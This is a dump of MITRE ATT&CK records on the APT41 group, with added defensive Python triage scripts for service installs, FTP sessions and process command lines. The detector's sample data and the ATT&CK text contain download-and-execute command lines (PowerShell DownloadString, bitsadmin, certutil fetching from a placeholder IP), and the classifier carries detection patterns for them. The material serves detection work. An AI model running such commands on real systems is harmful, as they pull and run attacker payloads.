relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used svchost.exe and [Net](https://attack.mitre.org/software/S0039) to execute a system service installed to launch a [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--84dc2fd1-a443-4ce6-866a-c58cffc1b0f3
revoked : False
technique : Service Execution
technique_description : Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content by starting either a new or a modified service. This technique is the execution component used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1569.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Process: Process Creation', 'Command: Command Execution']
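The "Service: Service Creation" data source above corresponds on Windows to System event 7045 ("A service was installed in the system"), which records the service name and the image path the service control manager will run. The following is an added triage example (not ATT&CK's content and not from any APT41 report) that applies the patterns from the technique text to constructed 7045 records: the PsExec temporary service, a command interpreter or encoded PowerShell as the service binary, binaries staged in writable directories, binaries launched from a remote `ADMIN$` share, and, because the relationship above involved a service run under `svchost.exe`, svchost-hosted services missing from a per-host baseline. The records, the `BASELINE` set and the regular expressions are assumptions.

```python
"""Triage Windows System event 7045 ("A service was installed in the system") for
service-execution patterns: PsExec-style services, a command interpreter or encoded
PowerShell as the service binary, binaries in writable directories, binaries on a remote
ADMIN$ share, and svchost-hosted services absent from the host baseline.

Added example; not part of ATT&CK or of any APT41 report. The records and the baseline
are constructed; on a live host the same fields (ServiceName, ImagePath, AccountName)
come from the EventData of event 7045.
"""
import re

IMAGE_PATTERNS = [
    (re.compile(r"(^|\\)(cmd\.exe|%COMSPEC%).*\s/[cC](\s|$)"),
     "command interpreter as service binary"),
    (re.compile(r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\b", re.I),
     "encoded PowerShell command line"),
    (re.compile(r"\\(Windows\\Temp|Users\\[^\\]+\\AppData|ProgramData)\\", re.I),
     "binary staged in a user-writable directory"),
    (re.compile(r"^\\\\[^\\]+\\ADMIN\$\\", re.I),
     "binary launched from a remote ADMIN$ share"),
]
SVCHOST = re.compile(r"\\svchost\.exe\b", re.I)


def triage_7045(events, known_services=frozenset()):
    """Return {service_name: [reasons]} for the events that deserve a look."""
    flagged = {}
    for e in events:
        name, image = e["ServiceName"], e["ImagePath"]
        reasons = []
        if name.upper() == "PSEXESVC" or image.upper().endswith("PSEXESVC.EXE"):
            reasons.append("PsExec service (remote execution via the SCM)")
        for pattern, why in IMAGE_PATTERNS:
            if pattern.search(image):
                reasons.append(why)
        if SVCHOST.search(image) and name not in known_services:
            # 7045 does not carry the ServiceDll, so a new svchost-hosted service has to be
            # followed up in HKLM\SYSTEM\CurrentControlSet\Services\<name>\Parameters.
            reasons.append("svchost-hosted service not in baseline; inspect its ServiceDll")
        if reasons:
            flagged[name] = reasons
    return flagged


EVENTS = [  # constructed 7045 records
    {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "WindowsUpdateSvc",
     "ImagePath": r"%COMSPEC% /C start C:\Windows\Temp\svc.exe", "AccountName": "LocalSystem"},
    {"ServiceName": "VendorAgent", "ImagePath": r'"C:\Program Files\Vendor\agent.exe" /svc',
     "AccountName": "LocalSystem"},
    {"ServiceName": "SysHelper", "ImagePath": r"%SystemRoot%\System32\svchost.exe -k netsvcs",
     "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe",
     "AccountName": "LocalSystem"},
]
BASELINE = frozenset({"Spooler", "Dhcp", "Dnscache", "Schedule"})  # constructed per-host baseline

if __name__ == "__main__":
    for name, reasons in triage_7045(EVENTS, known_services=BASELINE).items():
        print(name, "->", "; ".join(reasons))
```

A service installed from a remote session leaves a second trace that this example does not need but an investigation should pair with it: the 4624 logon type 3 and the 5145 `IPC$`/`svcctl` access on the same host a few seconds before the 7045.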
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) executed <code>file /bin/pwd</code> in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--a8b93875-6ad4-492e-afa1-0549ada7d7ca
revoked : False
technique : Unix Shell
technique_description : Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.004
matrix : mitre-attack
platform : ['macOS', 'Linux']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
permissions_required : ['User', 'root']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has executed <code>file /bin/pwd</code> on exploited victims, perhaps to determine the architecture (the output of <code>file</code> on an ELF binary includes its word size and target CPU).(Citation: FireEye APT41 March 2020)
relationship_id : relationship--d9416afb-0aeb-4ee3-bd96-dc331f40f37d
revoked : False
technique : File and Directory Discovery
technique_description : Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1083
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate a download via [ftp](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)
relationship_id : relationship--2cd69fd0-d5ad-41db-aaee-fd58e46bfaaa
revoked : False
technique : File Transfer Protocols
technique_description : Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
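The parser below is an added example and is not part of the ATT&CK record or the FireEye reporting it cites. It works on what the Network Traffic Content data source listed above actually yields for this technique: a reassembled FTP control channel. It decodes the data-channel endpoint that PASV replies and PORT commands carry as six decimal octets, lists what was pulled and pushed, and surfaces the traits an analyst would want flagged for a session like the one in the relationship (an exploit payload fetching a file over ftp). The transcript, the executable-extension list and the heuristics are constructed assumptions for the example.

```python
"""Triage a reconstructed FTP control-channel session (T1071.002).

Added example, not part of the ATT&CK record. Input is a constructed
control-channel transcript in the form a flow reassembler gives it:
lines starting with '>' are client commands, '<' are server replies.
"""
import re
from dataclasses import dataclass, field

# Assumed for the example: extensions that should rarely cross FTP in a workstation estate.
EXEC_EXTENSIONS = (".exe", ".dll", ".ps1", ".vbs", ".bat", ".elf", ".so", ".sh")
PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
PORT_RE = re.compile(r"^(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)$")


@dataclass
class FtpSession:
    user: str = ""
    data_endpoints: list = field(default_factory=list)  # (ip, port) announced via PASV/PORT
    retrieved: list = field(default_factory=list)       # RETR arguments (downloads)
    stored: list = field(default_factory=list)          # STOR arguments (uploads)
    findings: list = field(default_factory=list)


def decode_endpoint(h1, h2, h3, h4, p1, p2):
    """PASV replies and PORT commands encode the data-channel endpoint as six
    decimal octets: four for the IPv4 address, two for the port (p1*256 + p2)."""
    return f"{h1}.{h2}.{h3}.{h4}", int(p1) * 256 + int(p2)


def parse_ftp_session(transcript: str) -> FtpSession:
    s = FtpSession()
    for raw in transcript.splitlines():
        line = raw.strip()
        if not line:
            continue
        direction, _, text = line.partition(" ")
        if direction == ">":                       # client -> server
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                s.user = arg
            elif verb == "PORT":
                m = PORT_RE.match(arg)
                if m:
                    s.data_endpoints.append(decode_endpoint(*m.groups()))
            elif verb == "RETR":
                s.retrieved.append(arg)
            elif verb == "STOR":
                s.stored.append(arg)
        elif direction == "<" and text.startswith("227"):   # server -> client, PASV reply
            m = PASV_RE.search(text)
            if m:
                s.data_endpoints.append(decode_endpoint(*m.groups()))
    # Heuristics (assumed for the example): what an analyst would want surfaced.
    for name in s.retrieved:
        if name.lower().endswith(EXEC_EXTENSIONS):
            s.findings.append(f"executable download: {name}")
    if s.stored:
        s.findings.append(f"upload of {len(s.stored)} file(s); check for exfiltration")
    if s.user.lower() in ("anonymous", "ftp"):
        s.findings.append("anonymous login")
    return s


# Constructed transcript: an anonymous login that pulls a binary and pushes an archive.
SAMPLE_SESSION = """\
< 220 FTP server ready.
> USER anonymous
< 331 Please specify the password.
> PASS x@x
< 230 Login successful.
> TYPE I
< 200 Switching to Binary mode.
> PASV
< 227 Entering Passive Mode (198,51,100,7,195,80).
> RETR update.exe
< 150 Opening BINARY mode data connection for update.exe (49152 bytes).
< 226 Transfer complete.
> PORT 10,0,0,5,4,1
< 200 PORT command successful.
> STOR docs.zip
< 150 Ok to send data.
< 226 Transfer complete.
> QUIT
< 221 Goodbye.
"""

if __name__ == "__main__":
    session = parse_ftp_session(SAMPLE_SESSION)
    print("user:", session.user)
    print("data channels:", session.data_endpoints)
    for finding in session.findings:
        print("finding:", finding)
```

The decoded data-channel endpoints are the part worth keeping: a sensor that only watches port 21 never sees the transferred bytes, so the PASV/PORT tuple is what lets you correlate the control session with the flow that actually carried the payload (the Network Traffic Flow data source).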
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--e7fc5a89-f5a7-432f-a885-6b9532153e7e
revoked : False
technique : Exploit Public-Facing Application
technique_description : Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP Top 10 and CWE Top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1190
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--d316289b-26fa-49d7-8ed0-3fa56cc858b7
revoked : False
technique : BITS Jobs
technique_description : Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications that prefer to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS-enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionality can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1197
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Service: Service Metadata']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--f234930f-f7d1-458d-8c79-c73538990f97
revoked : False
technique : Multi-Stage Channels
technique_description : Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1104
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--b42c23c9-99f4-4b1f-91e2-a945a119fe98
revoked : False
technique : Ingress Tool Transfer
technique_description : Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).

On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)

Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.

Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1105
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Network Traffic: Network Connection Creation']
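The triage script below is an added example, not code from the ATT&CK record, from FireEye, or from APT41 tooling. It serves three relationships on this page at once, because all three surface the same way in the Command Execution and Process Creation data sources, as a command line under a parent process: the <code>file /bin/pwd</code> discovery command (T1083), BITSAdmin downloads (T1197) and certutil or PowerShell tool transfer (T1105). The event records, the rule regexes, the list of server-side parent processes and the scoring are assumptions for the example; the "server parent" bonus encodes the pattern this page describes, where discovery and download commands are spawned by an exploited public-facing application (T1190).

```python
"""Map process-creation events to ATT&CK techniques by command line.

Added example, not part of the ATT&CK record. Events are constructed in the
shape of normalised Sysmon Event ID 1 / auditd EXECVE records. The rules, the
server-side parent list and the scoring are assumptions for the example.
"""
import re

SEP = r"(?:^|[\s;&|'\"])"   # start of line, or a shell separator/quote, before a command word

# (technique IDs, rule name, regex over the full command line)
RULES = [
    (("T1083",), "unix file/directory discovery",
     re.compile(SEP + r"(?:ls|find|locate|file|tree)\s+[-/~.]", re.I)),
    (("T1083",), "windows file/directory discovery",
     re.compile(SEP + r"(?:dir|tree)(?:\s|$)", re.I)),
    (("T1197", "T1105"), "BITS download",
     re.compile(r"bitsadmin(?:\.exe)?\s.*?/(?:transfer|addfile)|start-bitstransfer", re.I)),
    (("T1105",), "certutil download",
     re.compile(r"certutil(?:\.exe)?\s.*?-urlcache", re.I)),
    (("T1105",), "PowerShell download cradle",
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|" + SEP + r"iwr\s", re.I)),
    (("T1105",), "unix fetch utility",
     re.compile(SEP + r"(?:curl|wget|tftp|scp|sftp)\s", re.I)),
]

# Assumed: processes that serve public-facing applications. A discovery or
# download command spawned directly by one of these is the post-exploitation
# pattern (T1190 -> T1083/T1105) described on this page.
SERVER_PARENTS = {"java", "java.exe", "w3wp.exe", "httpd", "nginx", "php-fpm", "tomcat"}


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> dict:
    cmd = event.get("command_line", "")
    hits = [(tids, name) for tids, name, rx in RULES if rx.search(cmd)]
    server_parent = _basename(event.get("parent_image", "")) in SERVER_PARENTS
    score = len(hits) + (2 if hits and server_parent else 0)
    return {
        "host": event.get("host"),
        "command_line": cmd,
        "techniques": sorted({t for tids, _ in hits for t in tids}),
        "rules": [name for _, name in hits],
        "server_parent": server_parent,
        "score": score,
    }


def triage(events) -> list:
    """Classify every event, drop the ones that match nothing, highest score first."""
    results = [classify(e) for e in events]
    return sorted((r for r in results if r["techniques"]), key=lambda r: -r["score"])


# Constructed events. The URLs use the 198.51.100.0/24 documentation range.
SAMPLE_EVENTS = [
    {"host": "web01", "parent_image": "/usr/bin/java", "image": "/bin/sh",
     "command_line": "sh -c 'file /bin/pwd'"},
    {"host": "web02", "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"},
    {"host": "ws07", "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job1 /download /priority high http://198.51.100.7/a.png C:\Windows\Temp\a.dll"},
    {"host": "ws07", "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -urlcache -split -f http://198.51.100.7/b.txt C:\Windows\Temp\b.exe"},
    {"host": "ws03", "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["score"], r["host"], r["techniques"], r["rules"], r["command_line"])
```

Discovery commands such as <code>ls</code> or <code>file</code> are noisy on their own, which is why the unix rule requires a path-like argument and why the score, not the match, drives the queue: the same <code>file /bin/pwd</code> run from an interactive shell scores 1, while run from the web application's JVM it scores 3 and comes out on top.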
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)
|
||
relationship_id : relationship--f1a9d2b9-f5ec-4119-b3b5-8b46085c01b5
|
||
revoked : False
|
||
technique : Obfuscated Files or Information
|
||
technique_description : Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
|
||
|
||
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.
|
||
|
||
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
|
||
|
||
